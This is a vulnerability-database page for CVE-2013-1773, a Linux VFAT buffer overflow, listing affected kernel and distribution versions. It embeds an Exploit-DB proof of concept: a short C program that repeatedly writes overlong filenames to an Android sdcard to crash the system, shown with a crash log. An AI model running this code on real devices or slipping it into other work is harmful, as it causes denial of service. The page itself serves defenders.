VIR Vulnerability Intelligence Relay

CVE-2013-1773

medium
Published 2013-02-28 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
7.2

Description

Buffer overflow in the VFAT filesystem implementation in the Linux kernel before 3.3 allows local users to gain privileges or cause a denial of service (system crash) via a VFAT write operation on a filesystem with the utf8 mount option, which is not properly handled during UTF-8 to UTF-16 conversion.

Predictions

Exploit likelihood
55%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-23248 dos android verified text ยท 3 KB
G13 ยท 2012-12-09

Google Android Kernel 2.6 - Local Denial of Service Crash (PoC)

text exploit Source: Exploit-DB 
# Exploit Title: Android Kernel 2.6 Local DoS
# Date: 12/7/12
# Author: G13
# Twitter: @g13net
# Versions: Android 2.2, 2.3
# Category: DoS (android)
#

##### Vulnerability #####

The Android OS is vulnerable to a local DoS when a filename with a
length of 2048
or larger is attempted to be written to the sdcard(vfat fs) multiple times.

The result of successful running of the exploit code is the system restarting.

The vulnerability only effects Android kernels that are in the version
2.6 family.

##### Vendor Timeline #####

The Android Security Team has been contacted with updated PoC code and
details.

They have been aware of this vulnerability for over a year.

##### Tombstone #####

*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint:
'verizon/SCH-I800/SCH-I800:2.3.4/GINGERBREAD/EF01:user/release-keys'
pid: 349, tid: 363, name: SensorService  >>> system_server <<<
signal 8 (SIGFPE), code -6 (?), fault addr 0000015d
    r0 00000000  r1 00000008  r2 00000040  r3 00000000
    r4 2a114310  r5 00000000  r6 51504690  r7 00000025
    r8 2a114330  r9 2a114350  sl 00000003  fp 00000003
    ip fffd4084  sp 51501eb0  lr 40039b70  pc 40037cf0  cpsr 20030010
    d0  4271bc7bd0b80000  d1  0000000000000000
    d2  0000000000000000  d3  427181eae9200000
    d4  0000000000000000  d5  0000000000000000
    d6  0000000000000000  d7  0000000000000000
    d8  0000000000000000  d9  0000000000000000
    d10 0000000000000000  d11 0000000000000000
    d12 0000000000000000  d13 0000000000000000
    d14 0000000000000000  d15 0000000000000000
    d16 3fe99999a0000000  d17 3fe999999999999a
    d18 0033003200310030  d19 0000000000000000
    d20 3fc554e7eb0eb47c  d21 3e66376972bea4d0
    d22 3f4de16b9c24a98f  d23 3fb0f4a31edab38b
    d24 3fede16b9c24a98f  d25 3fe55559ee5e69f9
    d26 0000000000000000  d27 0000000000000000
    d28 0000000000000005  d29 0000000000000000
    d30 0000000000000000  d31 0000000000000000
    scr 20000010

backtrace:
    #00  pc 0000dcf0  /system/lib/libc.so (kill+12)
    #01  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #02  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #03  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #04  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #05  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #06  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #07  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #08  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #09  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #10  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #11  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #12  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #13  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #14  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #15  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)
    #16  pc 0000fb6c  /system/lib/libc.so (__aeabi_idiv0+8)

##### PoC #####

#include <stdio.h>

int main(int argc, char** argv) {
  char buf[5000];
  int j,k;
  FILE *fp;
  /* Path to sdcard, typically /sdcard/ */
  strcpy(buf,"/sdcard/");
  for(k=0;k<=2048;k++){
    strcat(buf,"A");
  };
  for(j=0;j<=50;j++){
    fp=fopen(buf,"w");
  };
return 0;
}

OS impact
linux Linux kernel Affected 89 releases
VersionStatusFixed in
3.3 Affected โ€”
3.2.30 Affected โ€”
3.2.29 Affected โ€”
3.2.28 Affected โ€”
3.2.27 Affected โ€”
3.2.26 Affected โ€”
3.2.25 Affected โ€”
3.2.24 Affected โ€”
3.2.23 Affected โ€”
3.2.22 Affected โ€”
3.2.21 Affected โ€”
3.2.20 Affected โ€”
3.2.19 Affected โ€”
3.2.18 Affected โ€”
3.2.17 Affected โ€”
3.2.16 Affected โ€”
3.2.15 Affected โ€”
3.2.14 Affected โ€”
3.2.13 Affected โ€”
3.2.12 Affected โ€”
3.2.11 Affected โ€”
3.2.10 Affected โ€”
3.2.9 Affected โ€”
3.2.8 Affected โ€”
3.2.7 Affected โ€”
3.2.6 Affected โ€”
3.2.5 Affected โ€”
3.2.4 Affected โ€”
3.2.3 Affected โ€”
3.2.2 Affected โ€”
3.2.1 Affected โ€”
3.2 Affected โ€”
3.1.10 Affected โ€”
3.1.9 Affected โ€”
3.1.8 Affected โ€”
3.1.7 Affected โ€”
3.1.6 Affected โ€”
3.1.5 Affected โ€”
3.1.4 Affected โ€”
3.1.3 Affected โ€”
3.1.2 Affected โ€”
3.1.1 Affected โ€”
3.1 Affected โ€”
3.0.44 Affected โ€”
3.0.43 Affected โ€”
3.0.42 Affected โ€”
3.0.41 Affected โ€”
3.0.40 Affected โ€”
3.0.39 Affected โ€”
3.0.38 Affected โ€”
3.0.37 Affected โ€”
3.0.36 Affected โ€”
3.0.35 Affected โ€”
3.0.34 Affected โ€”
3.0.33 Affected โ€”
3.0.32 Affected โ€”
3.0.31 Affected โ€”
3.0.30 Affected โ€”
3.0.29 Affected โ€”
3.0.28 Affected โ€”
3.0.27 Affected โ€”
3.0.26 Affected โ€”
3.0.25 Affected โ€”
3.0.24 Affected โ€”
3.0.23 Affected โ€”
3.0.22 Affected โ€”
3.0.21 Affected โ€”
3.0.20 Affected โ€”
3.0.19 Affected โ€”
3.0.18 Affected โ€”
3.0.17 Affected โ€”
3.0.16 Affected โ€”
3.0.15 Affected โ€”
3.0.14 Affected โ€”
3.0.13 Affected โ€”
3.0.12 Affected โ€”
3.0.11 Affected โ€”
3.0.10 Affected โ€”
3.0.9 Affected โ€”
3.0.8 Affected โ€”
3.0.7 Affected โ€”
3.0.6 Affected โ€”
3.0.5 Affected โ€”
3.0.4 Affected โ€”
3.0.3 Affected โ€”
3.0.2 Affected โ€”
3.0.1 Affected โ€”
3.0 Affected โ€”
โ€” Affected โ€”
redhat Red Hat Affected 1 release
VersionStatusFixed in
6.0 Affected โ€”
debian Debian Fixed 5 releases
VersionStatusFixed in
trixie Fixed 3.2.15-1
sid Fixed 3.2.15-1
forky Fixed 3.2.15-1
bullseye Fixed 3.2.15-1
bookworm Fixed 3.2.15-1

References

CWEs

CWE-119

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.